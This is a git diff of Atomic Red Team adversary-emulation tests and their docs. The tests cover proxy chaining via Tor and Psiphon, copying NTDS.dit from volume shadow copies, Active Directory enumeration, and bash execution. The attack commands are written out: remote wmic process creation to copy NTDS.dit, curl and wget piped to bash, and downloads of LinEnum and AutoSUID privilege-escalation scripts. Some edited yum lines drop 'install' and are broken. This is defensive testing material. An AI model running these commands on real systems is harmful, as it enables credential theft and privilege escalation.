-        prereq_command: 'if (Test-Path $env:Temp\proxy-backup.txt) {exit 0} else {exit
-          1}
-
-'
-        get_prereq_command: |
-          if(-not (test-path $env:Temp\proxy-backup.txt)){
-          $Proxy = (Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings' -Name "ProxyServer" -ErrorAction Ignore).ProxyServer
-          Set-Content $env:Temp\proxy-backup.txt $Proxy}
-      - description: 'The Psiphon executable must exist in the Downloads folder
-
-'
-        prereq_command: 'if (Test-Path $env:UserProfile\Downloads\psiphon3.exe) {exit
-          0} else {exit 1}
-
-'
-        get_prereq_command: 'Invoke-WebRequest -OutFile "$env:UserProfile\Downloads\psiphon3.exe"
-          "https://s3.amazonaws.com/0ubz-2q11-gi9y/psiphon3.exe"
-
-'
-      executor:
-        name: powershell
-        command: 'PathToAtomicsFolder\T1090.003\src\Psiphon.bat
-
-'
-        cleanup_command: "$Proxy = Get-Content $env:Temp\\proxy-backup.txt -ErrorAction
-          Ignore\nif($null -ne $Proxy) \n{Set-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet
-          Settings' -Name \"ProxyServer\" -Value $Proxy}\n"
-    - name: Tor Proxy Usage - Windows
-      auto_generated_guid: 7b9d85e5-c4ce-4434-8060-d3de83595e69
-      description: "This test is designed to launch the tor proxy service, which is
-        what is utilized in the background by the Tor Browser and other applications
-        with add-ons in order to provide onion routing functionality.\nUpon successful
-        execution, the tor proxy will be launched, run for 60 seconds, and then exit.
-        \n"
-      supported_platforms:
-      - windows
-      input_arguments:
-        TorExe:
-          description: Location of tor.exe file.
-          type: String
-          default: "$env:temp\\tor\\Tor\\tor.exe"
-      dependency_executor_name: powershell
-      dependencies:
-      - description: "tor.exe must be installed on the machine \n"
-        prereq_command: 'if (Test-Path #{TorExe}) {exit 0} else {exit 1}
-
-'
-        get_prereq_command: |
-          Start-BitsTransfer -Source "https://archive.torproject.org/tor-package-archive/torbrowser/11.0.6/tor-win32-0.4.6.9.zip" -Destination "$env:temp\tor.zip" -dynamic
-          expand-archive -LiteralPath "$env:temp\tor.zip" -DestinationPath "$env:temp\tor"
-      executor:
-        command: |
-          invoke-expression 'cmd /c start powershell -Command {cmd /c #{TorExe}}'
-          sleep -s 60
-          stop-process -name "tor" | out-null
-        name: powershell
-        elevation_required: false
+    atomic_tests: []
  T1026:
    technique:
      id: attack-pattern--99709758-2b96-48f2-a68a-ad7fbd828091
@@ -24,11 +24,9 @@ The following tools and techniques can be used to enumerate the NTDS file and th

 - [Atomic Test #5 - Create Volume Shadow Copy remotely with WMI](#atomic-test-5---create-volume-shadow-copy-remotely-with-wmi)

- [Atomic Test #6 - Create Volume Shadow Copy remotely (WMI) with esentutl](#atomic-test-6---create-volume-shadow-copy-remotely-wmi-with-esentutl)
+- [Atomic Test #6 - Create Volume Shadow Copy with Powershell](#atomic-test-6---create-volume-shadow-copy-with-powershell)

- [Atomic Test #7 - Create Volume Shadow Copy with Powershell](#atomic-test-7---create-volume-shadow-copy-with-powershell)
-
- [Atomic Test #8 - Create Symlink to Volume Shadow Copy](#atomic-test-8---create-symlink-to-volume-shadow-copy)
+- [Atomic Test #7 - Create Symlink to Volume Shadow Copy](#atomic-test-7---create-symlink-to-volume-shadow-copy)


 <br/>
@@ -308,55 +306,7 @@ echo Sorry, can't connect to target host, check: network, firewall or permission
 <br/>
 <br/>

-## Atomic Test #6 - Create Volume Shadow Copy remotely (WMI) with esentutl
-This test is intended to be run from a remote workstation with domain admin context.
-The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy created with esentutl.
-
-**Supported Platforms:** Windows
-
-
-**auto_generated_guid:** 21c7bf80-3e8b-40fa-8f9d-f5b194ff2865
-
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| source_path | File to shadow copy | String | c:&#92;windows&#92;ntds&#92;ntds.dit|
-| target_path | Target path of the result file | String | c:&#92;ntds.dit|
-| target_host | IP Address / Hostname you want to target | String | localhost|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-wmic /node:"#{target_host}" process call create "cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}"
-```
-
-
-
-
-#### Dependencies:  Run with `command_prompt`!
-##### Description: Target must be a reachable Domain Controller, and current context must be domain admin
-##### Check Prereq Commands:
-```cmd
-wmic /node:"#{target_host}" shadowcopy list brief
-```
-##### Get Prereq Commands:
-```cmd
-echo Sorry, can't connect to target host, check: network, firewall or permissions (must be admin on target)
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #7 - Create Volume Shadow Copy with Powershell
+## Atomic Test #6 - Create Volume Shadow Copy with Powershell
 This test is intended to be run on a domain Controller.

 The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
@@ -391,7 +341,7 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
 <br/>
 <br/>

-## Atomic Test #8 - Create Symlink to Volume Shadow Copy
+## Atomic Test #7 - Create Symlink to Volume Shadow Copy
 This test is intended to be run on a domain Controller.

 The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy.
@@ -167,39 +167,6 @@ atomic_tests:
    name: command_prompt
    elevation_required: true

- name: Create Volume Shadow Copy remotely (WMI) with esentutl
-  auto_generated_guid: 21c7bf80-3e8b-40fa-8f9d-f5b194ff2865
-  description: |
-    This test is intended to be run from a remote workstation with domain admin context.
-    The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy created with esentutl.
-  supported_platforms:
-  - windows
-  input_arguments:
-    source_path:
-      description: File to shadow copy
-      type: String
-      default: 'c:\windows\ntds\ntds.dit'
-    target_path:
-      description: Target path of the result file
-      type: String
-      default: 'c:\ntds.dit'
-    target_host:
-      description: IP Address / Hostname you want to target
-      type: String
-      default: localhost
-  dependencies:
-  - description: |
-      Target must be a reachable Domain Controller, and current context must be domain admin
-    prereq_command: |
-      wmic /node:"#{target_host}" shadowcopy list brief
-    get_prereq_command: |
-      echo Sorry, can't connect to target host, check: network, firewall or permissions (must be admin on target)
-  executor:
-    command: |
-      wmic /node:"#{target_host}" process call create "cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}"
-    name: command_prompt
-    elevation_required: true
-
 - name: Create Volume Shadow Copy with Powershell
  auto_generated_guid: 542bb97e-da53-436b-8e43-e0a7d31a6c24
  description: |
@@ -34,8 +34,6 @@ Specific to macOS, the <code>bonjour</code> protocol exists to discover addition

 - [Atomic Test #14 - Remote System Discovery - ip tcp_metrics](#atomic-test-14---remote-system-discovery---ip-tcp_metrics)

- [Atomic Test #15 - Enumerate domain computers within Active Directory using DirectorySearcher](#atomic-test-15---enumerate-domain-computers-within-active-directory-using-directorysearcher)
-

 <br/>

@@ -585,53 +583,4 @@ apt-get install iproute2 -y



-<br/>
-<br/>
-
-## Atomic Test #15 - Enumerate domain computers within Active Directory using DirectorySearcher
-This test is a Powershell script that enumerates Active Directory to determine computers that are joined to the domain. 
-This test is designed to mimic how SessionGopher can determine the additional systems within a domain, which has been used before by threat actors to aid in lateral movement. 
-Reference: [Head Fake: Tackling Disruptive Ransomware Attacks](https://www.mandiant.com/resources/head-fake-tackling-disruptive-ransomware-attacks). 
-Upon successful execution, this test will output the names of the computers that reside on the domain to the console window.
-
-**Supported Platforms:** Windows
-
-
-**auto_generated_guid:** 962a6017-1c09-45a6-880b-adc9c57cb22e
-
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-$DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher("(ObjectCategory=Computer)")
-$DirectorySearcher.PropertiesToLoad.Add("Name")
-$Computers = $DirectorySearcher.findall()
-foreach ($Computer in $Computers) {
-  $Computer = $Computer.Properties.name
-  if (!$Computer) { Continue }
-  Write-Host $Computer}
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: This PC must be joined to a domain.
-##### Check Prereq Commands:
-```powershell
-if ((Get-WmiObject -Class Win32_ComputerSystem).partofdomain -eq $true) {exit 0} else {exit 1}
-```
-##### Get Prereq Commands:
-```powershell
-write-host "This PC must be manually added to a domain."
-```
-
-
-
-
 <br/>
@@ -283,30 +283,4 @@ atomic_tests:
    command: |
      ip tcp_metrics show |grep --invert-match "^127\."
    name: sh
- name: Enumerate domain computers within Active Directory using DirectorySearcher
-  auto_generated_guid: 962a6017-1c09-45a6-880b-adc9c57cb22e
-  description: |
-    This test is a Powershell script that enumerates Active Directory to determine computers that are joined to the domain. 
-    This test is designed to mimic how SessionGopher can determine the additional systems within a domain, which has been used before by threat actors to aid in lateral movement. 
-    Reference: [Head Fake: Tackling Disruptive Ransomware Attacks](https://www.mandiant.com/resources/head-fake-tackling-disruptive-ransomware-attacks). 
-    Upon successful execution, this test will output the names of the computers that reside on the domain to the console window. 
-  supported_platforms:
-  - windows
-  dependency_executor_name: powershell
-  dependencies:
-  - description: This PC must be joined to a domain. 
-    prereq_command: |-
-     if ((Get-WmiObject -Class Win32_ComputerSystem).partofdomain -eq $true) {exit 0} else {exit 1}		
-    get_prereq_command: |-
-      write-host "This PC must be manually added to a domain." 
-  executor:
-    command: |
-      $DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher("(ObjectCategory=Computer)")
-      $DirectorySearcher.PropertiesToLoad.Add("Name")
-      $Computers = $DirectorySearcher.findall()
-      foreach ($Computer in $Computers) {
-        $Computer = $Computer.Properties.name
-        if (!$Computer) { Continue }
-        Write-Host $Computer}
-    name: powershell
-    elevation_required: false
+
@@ -58,7 +58,7 @@ if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exi
 ```
 ##### Get Prereq Commands:
 ```bash
-(which yum && yum -y install epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)
+(which yum && yum -y epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)
 ```


@@ -106,7 +106,7 @@ if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exi
 ```
 ##### Get Prereq Commands:
 ```bash
-(which yum && yum -y install epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)
+(which yum && yum -y epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)
 ```


@@ -21,7 +21,7 @@ atomic_tests:
      prereq_command: |
        if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi;
      get_prereq_command: |
-        (which yum && yum -y install epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)
+        (which yum && yum -y epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)
  executor:
    command: |
      tcpdump -c 5 -nnni #{interface}
@@ -48,7 +48,7 @@ atomic_tests:
      prereq_command: |
        if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi;
      get_prereq_command: |
-        (which yum && yum -y install epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)
+        (which yum && yum -y epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)
  executor:
    command: |
      sudo tcpdump -c 5 -nnni #{interface}    
@@ -92,7 +92,7 @@ if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi;
 ```
 ##### Get Prereq Commands:
 ```sh
-(which yum && yum -y install epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)
+(which yum && yum -y epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)
 ```


@@ -46,7 +46,7 @@ atomic_tests:
    prereq_command: |
      if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi;
    get_prereq_command: |
-      (which yum && yum -y install epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)
+      (which yum && yum -y epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)
  executor:
    command: |
      nmap -sS #{network_range} -p #{port}
@@ -12,10 +12,6 @@ Adversaries may abuse Unix shells to execute various commands or payloads. Inter

 - [Atomic Test #2 - Command-Line Interface](#atomic-test-2---command-line-interface)

- [Atomic Test #3 - Harvest SUID executable files](#atomic-test-3---harvest-suid-executable-files)
-
- [Atomic Test #4 - LinEnum tool execution](#atomic-test-4---linenum-tool-execution)
-

 <br/>

@@ -91,98 +87,4 @@ rm /tmp/art-fish.txt



-<br/>
-<br/>
-
-## Atomic Test #3 - Harvest SUID executable files
-AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges.
-
-**Supported Platforms:** Linux
-
-
-**auto_generated_guid:** 46274fc6-08a7-4956-861b-24cbbaa0503c
-
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| autosuid | Path to the autosuid shell script | Path | PathToAtomicsFolder/T1059.004/src/AutoSUID.sh|
-| autosuid_url | Path to download autosuid shell script | Url | https://raw.githubusercontent.com/IvanGlinkin/AutoSUID/main/AutoSUID.sh|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-chmod +x #{autosuid}
-bash #{autosuid}
-```
-
-
-
-
-#### Dependencies:  Run with `bash`!
-##### Description: AutoSUID must exist on disk at specified location (#{autosuid})
-##### Check Prereq Commands:
-```bash
-if [ -f #{autosuid} ]; then exit 0; else exit 1; fi;
-```
-##### Get Prereq Commands:
-```bash
-curl #{autosuid_url} --output #{autosuid}
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - LinEnum tool execution
-LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host.
-
-**Supported Platforms:** Linux
-
-
-**auto_generated_guid:** a2b35a63-9df1-4806-9a4d-5fe0500845f2
-
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| linenum | Path to the LinEnum shell script | Path | PathToAtomicsFolder/T1059.004/src/LinEnum.sh|
-| linenum_url | Path to download LinEnum shell script | Url | https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-chmod +x #{linenum}
-bash #{linenum}
-```
-
-
-
-
-#### Dependencies:  Run with `bash`!
-##### Description: LinnEnum must exist on disk at specified location (#{linenum})
-##### Check Prereq Commands:
-```bash
-if [ -f #{linenum} ]; then exit 0; else exit 1; fi;
-```
-##### Get Prereq Commands:
-```bash
-curl #{linenum_url} --output #{linenum}
-```
-
-
-
-
 <br/>
@@ -1,125 +1,95 @@
-attack_technique: T1059.004
-display_name: 'Command and Scripting Interpreter: Bash'
-atomic_tests:
- name: Create and Execute Bash Shell Script
-  auto_generated_guid: 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873
-  description: |
-    Creates and executes a simple bash script.
-  supported_platforms:
-  - macos
-  - linux
-  input_arguments:
-    script_path:
-      description: Script path
-      type: Path
-      default: /tmp/art.sh
-  executor:
-    command: |
-      sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
-      sh -c "echo 'ping -c 4 8.8.8.8' >> #{script_path}"
-      chmod +x #{script_path}
-      sh #{script_path}
-    cleanup_command: |
-      rm #{script_path}
-    name: sh
- name: Command-Line Interface
-  auto_generated_guid: d0c88567-803d-4dca-99b4-7ce65e7b257c
-  description: |
-    Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server.
+  attack_technique: T1059.004
+  display_name: 'Command and Scripting Interpreter: Bash'
+  atomic_tests:
+  - name: Create and Execute Bash Shell Script
+    auto_generated_guid: 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873
+    description: |
+      Creates and executes a simple bash script.
+    supported_platforms:
+    - macos
+    - linux
+    input_arguments:
+      script_path:
+        description: Script path
+        type: Path
+        default: /tmp/art.sh
+    executor:
+      command: |
+        sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
+        sh -c "echo 'ping -c 4 8.8.8.8' >> #{script_path}"
+        chmod +x #{script_path}
+        sh #{script_path}
+      cleanup_command: |
+        rm #{script_path}
+      name: sh
+  - name: Command-Line Interface
+    auto_generated_guid: d0c88567-803d-4dca-99b4-7ce65e7b257c
+    description: |
+      Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server.

-    Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
-  supported_platforms:
-  - macos
-  - linux
-  executor:
-    command: |
-      curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
-      wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
-    cleanup_command: |
-      rm /tmp/art-fish.txt
-    name: sh
- name: Harvest SUID executable files
-  auto_generated_guid: 46274fc6-08a7-4956-861b-24cbbaa0503c
-  description: |
-    AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges. 
-  supported_platforms:
-  - linux 
-  input_arguments:
-    autosuid:
-      description: Path to the autosuid shell script
-      type: Path
-      default: PathToAtomicsFolder/T1059.004/src/AutoSUID.sh
-    autosuid_url:
-      description: Path to download autosuid shell script
-      type: Url
-      default: https://raw.githubusercontent.com/IvanGlinkin/AutoSUID/main/AutoSUID.sh
-  dependency_executor_name: bash
-  dependencies:
-  - description: |
-      AutoSUID must exist on disk at specified location (#{autosuid})
-    prereq_command: |
-      if [ -f #{autosuid} ]; then exit 0; else exit 1; fi;
-    get_prereq_command: |
-      curl #{autosuid_url} --output #{autosuid}
-  executor:
-    command: |
-      chmod +x #{autosuid}
-      bash #{autosuid}
-    name: sh
+      Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
+    supported_platforms:
+    - macos
+    - linux
+    executor:
+      command: |
+        curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
+        wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
+      cleanup_command: |
+        rm /tmp/art-fish.txt
+      name: sh
+  - name: Harvest SUID executable files
+    description: |
+      AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges. 
+    supported_platforms:
+    - linux 
+    input_arguments:
+      autosuid:
+        description: Path to the autosuid shell script
+        type: Path
+        default: PathToAtomicsFolder/T1059.004/src/AutoSUID.sh
+      autosuid_url:
+        description: Path to download autosuid shell script
+        type: Url
+        default: https://raw.githubusercontent.com/IvanGlinkin/AutoSUID/main/AutoSUID.sh
+    dependency_executor_name: bash
+    dependencies:
+    - description: |
+        AutoSUID must exist on disk at specified location (#{autosuid})
+      prereq_command: |
+        if [ -f #{autosuid} ]; then exit 0; else exit 1; fi;
+      get_prereq_command: |
+        curl #{autosuid_url} --output #{autosuid}
+    executor:
+      command: |
+        chmod +x #{autosuid}
+        bash #{autosuid}
+      name: sh

- name: LinEnum tool execution
-  auto_generated_guid: a2b35a63-9df1-4806-9a4d-5fe0500845f2
-  description: |
-    LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host.
-  supported_platforms:
-  - linux 
-  input_arguments:
-    linenum:
-      description: Path to the LinEnum shell script
-      type: Path
-      default: PathToAtomicsFolder/T1059.004/src/LinEnum.sh
-    linenum_url:
-      description: Path to download LinEnum shell script
-      type: Url
-      default: https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
-  dependency_executor_name: bash
-  dependencies:
-  - description: |
-      LinnEnum must exist on disk at specified location (#{linenum})
-    prereq_command: |
-      if [ -f #{linenum} ]; then exit 0; else exit 1; fi;
-    get_prereq_command: |
-      curl #{linenum_url} --output #{linenum}
-  executor:
-    command: |
-      chmod +x #{linenum}
-      bash #{linenum}
-    name: sh
-
- name: Linpeas tool execution
-  description: |
-    LinPEAS is a script that search for possible paths to escalate privileges on Linux/Unix*/MacOS hosts. The checks are explained on [here](https://book.hacktricks.xyz/)
-  supported_platforms:
-  - linux 
-  input_arguments:
-    linpeas:
-      description: Path to the linpeas shell script
-      type: Path
-      default: PathToAtomicsFolder/T1059.004/src/linpeas.sh
-    linpeas_url:
-      description: Path to download linPeas shell script
-      type: Url
-      default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh
-  dependency_executor_name: bash
-  dependencies:
-  - description: |
-      Linpeas must exist on disk at specified location (#{linpeas})
-    prereq_command: |
-      if [ -f #{linpeas} ]; then exit 0; else exit 1; fi;
-    get_prereq_command: |
-      curl -L #{linpeas_url} --output #{linpeas}
-  executor:
-    command: |
-      chmod +x #{linpeas}
-      bash #{linpeas}
-    name: sh
+  - name: LinEnum tool execution
+    description: |
+      LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host.
+    supported_platforms:
+    - linux 
+    input_arguments:
+      linenum:
+        description: Path to the LinEnum shell script
+        type: Path
+        default: PathToAtomicsFolder/T1059.004/src/LinEnum.sh
+      linenum_url:
+        description: Path to download LinEnum shell script
+        type: Url
+        default: https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
+    dependency_executor_name: bash
+    dependencies:
+    - description: |
+        LinnEnum must exist on disk at specified location (#{linenum})
+      prereq_command: |
+        if [ -f #{linenum} ]; then exit 0; else exit 1; fi;
+      get_prereq_command: |
+        curl #{linenum_url} --output #{linenum}
+    executor:
+      command: |
+        chmod +x #{linenum}
+        bash #{linenum}
+      name: sh
@@ -166,18 +166,6 @@ username=$(id -u -n) && lsof -u $username



-#### Dependencies:  Run with `sh`!
-##### Description: check if lsof exists
-##### Check Prereq Commands:
-```sh
-which lsof
-```
-##### Get Prereq Commands:
-```sh
-(which yum && yum -y install lsof)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y lsof)
-```
-
-


 <br/>
@@ -69,14 +69,6 @@ atomic_tests:
    command: |
      username=$(id -u -n) && lsof -u $username
    name: sh
-  dependency_executor_name: sh
-  dependencies:
-  - description: |
-      check if lsof exists
-    prereq_command: |
-      which lsof
-    get_prereq_command: |
-      (which yum && yum -y install lsof)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y lsof)
 - name: Show if a user account has ever logged in remotely
  auto_generated_guid: 0f0b6a29-08c3-44ad-a30b-47fd996b2110
  description: |
@@ -1,124 +0,0 @@
-# T1090.003 - Multi-hop Proxy
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1090/003)
-<blockquote>To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source. A particular variant of this behavior is to use onion routing networks, such as the publicly available TOR network. (Citation: Onion Routing)
-
-In the case of network infrastructure, particularly routers, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain within the Wide-Area Network (WAN) of the enterprise.  By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001), adversaries can add custom code to the affected network devices that will implement onion routing between those nodes.  This custom onion routing network will transport the encrypted C2 traffic through the compromised population, allowing adversaries to communicate with any device within the onion routing network.  This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method in order to allow the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s WAN. Protocols such as ICMP may be used as a transport.</blockquote>
-
-## Atomic Tests
-
- [Atomic Test #1 - Psiphon](#atomic-test-1---psiphon)
-
- [Atomic Test #2 - Tor Proxy Usage - Windows](#atomic-test-2---tor-proxy-usage---windows)
-
-
-<br/>
-
-## Atomic Test #1 - Psiphon
-Psiphon 3 is a circumvention tool from Psiphon Inc. that utilizes VPN, SSH and HTTP Proxy technology to provide you
-with uncensored access to Internet.
-This process will launch Psiphon 3 and establish a connection. Shortly after it will be shut down via process kill commands.
-More information can be found about Psiphon using the following urls
-http://s3.amazonaws.com/0ubz-2q11-gi9y/en.html
-https://psiphon.ca/faq.html
-
-**Supported Platforms:** Windows
-
-
-**auto_generated_guid:** 14d55ca0-920e-4b44-8425-37eedd72b173
-
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-PathToAtomicsFolder\T1090.003\src\Psiphon.bat
-```
-
-#### Cleanup Commands:
-```powershell
-$Proxy = Get-Content $env:Temp\proxy-backup.txt -ErrorAction Ignore
-if($null -ne $Proxy) 
-{Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings' -Name "ProxyServer" -Value $Proxy}
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: The proxy settings backup file must exist on disk at $env:Temp\proxy-backup.txt
-##### Check Prereq Commands:
-```powershell
-if (Test-Path $env:Temp\proxy-backup.txt) {exit 0} else {exit 1}
-```
-##### Get Prereq Commands:
-```powershell
-if(-not (test-path $env:Temp\proxy-backup.txt)){
-$Proxy = (Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings' -Name "ProxyServer" -ErrorAction Ignore).ProxyServer
-Set-Content $env:Temp\proxy-backup.txt $Proxy}
-```
-##### Description: The Psiphon executable must exist in the Downloads folder
-##### Check Prereq Commands:
-```powershell
-if (Test-Path $env:UserProfile\Downloads\psiphon3.exe) {exit 0} else {exit 1}
-```
-##### Get Prereq Commands:
-```powershell
-Invoke-WebRequest -OutFile "$env:UserProfile\Downloads\psiphon3.exe" "https://s3.amazonaws.com/0ubz-2q11-gi9y/psiphon3.exe"
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Tor Proxy Usage - Windows
-This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality.
-Upon successful execution, the tor proxy will be launched, run for 60 seconds, and then exit.
-
-**Supported Platforms:** Windows
-
-
-**auto_generated_guid:** 7b9d85e5-c4ce-4434-8060-d3de83595e69
-
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| TorExe | Location of tor.exe file. | String | $env:temp&#92;tor&#92;Tor&#92;tor.exe|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-invoke-expression 'cmd /c start powershell -Command {cmd /c #{TorExe}}'
-sleep -s 60
-stop-process -name "tor" | out-null
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: tor.exe must be installed on the machine
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{TorExe}) {exit 0} else {exit 1}
-```
-##### Get Prereq Commands:
-```powershell
-Start-BitsTransfer -Source "https://archive.torproject.org/tor-package-archive/torbrowser/11.0.6/tor-win32-0.4.6.9.zip" -Destination "$env:temp\tor.zip" -dynamic
-expand-archive -LiteralPath "$env:temp\tor.zip" -DestinationPath "$env:temp\tor"
-```
-
-
-
-
-<br/>
@@ -1,67 +0,0 @@
-attack_technique: T1090.003
-display_name: 'Proxy: Multi-hop Proxy'
-atomic_tests:
- name: Psiphon
-  auto_generated_guid: 14d55ca0-920e-4b44-8425-37eedd72b173
-  description: |
-    Psiphon 3 is a circumvention tool from Psiphon Inc. that utilizes VPN, SSH and HTTP Proxy technology to provide you
-    with uncensored access to Internet.
-    This process will launch Psiphon 3 and establish a connection. Shortly after it will be shut down via process kill commands.
-    More information can be found about Psiphon using the following urls
-    http://s3.amazonaws.com/0ubz-2q11-gi9y/en.html
-    https://psiphon.ca/faq.html
-  supported_platforms:
-    - windows
-  dependency_executor_name: powershell 
-  dependencies:
-    - description: |
-        The proxy settings backup file must exist on disk at $env:Temp\proxy-backup.txt
-      prereq_command: | 
-        if (Test-Path $env:Temp\proxy-backup.txt) {exit 0} else {exit 1}
-      get_prereq_command: |
-        if(-not (test-path $env:Temp\proxy-backup.txt)){
-        $Proxy = (Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings' -Name "ProxyServer" -ErrorAction Ignore).ProxyServer
-        Set-Content $env:Temp\proxy-backup.txt $Proxy}
-    - description: |
-        The Psiphon executable must exist in the Downloads folder
-      prereq_command: | 
-        if (Test-Path $env:UserProfile\Downloads\psiphon3.exe) {exit 0} else {exit 1}
-      get_prereq_command: |
-        Invoke-WebRequest -OutFile "$env:UserProfile\Downloads\psiphon3.exe" "https://s3.amazonaws.com/0ubz-2q11-gi9y/psiphon3.exe"
-  executor:
-    name: powershell
-    command: |
-      PathToAtomicsFolder\T1090.003\src\Psiphon.bat
-    cleanup_command: |
-      $Proxy = Get-Content $env:Temp\proxy-backup.txt -ErrorAction Ignore
-      if($null -ne $Proxy) 
-      {Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings' -Name "ProxyServer" -Value $Proxy}
-
- name: Tor Proxy Usage - Windows
-  auto_generated_guid: 7b9d85e5-c4ce-4434-8060-d3de83595e69
